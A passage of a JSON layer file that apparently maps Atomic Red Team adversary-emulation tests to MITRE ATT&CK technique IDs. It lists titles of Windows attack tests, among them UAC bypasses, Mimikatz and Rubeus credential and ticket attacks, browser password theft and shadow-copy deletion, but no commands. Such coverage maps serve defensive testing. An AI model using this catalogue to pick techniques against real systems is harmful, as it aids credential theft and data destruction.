Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n- Running DLL with .init extension and function\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":12,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n- RustDesk Files Detected Test on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1542","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1542/T1542.md"}]},{"techniqueID":"T1542.001","score":1,"enabled":true,"comment":"\n- UEFI Persistence via Wpbbin.exe File Creation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1542.001/T1542.001.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View 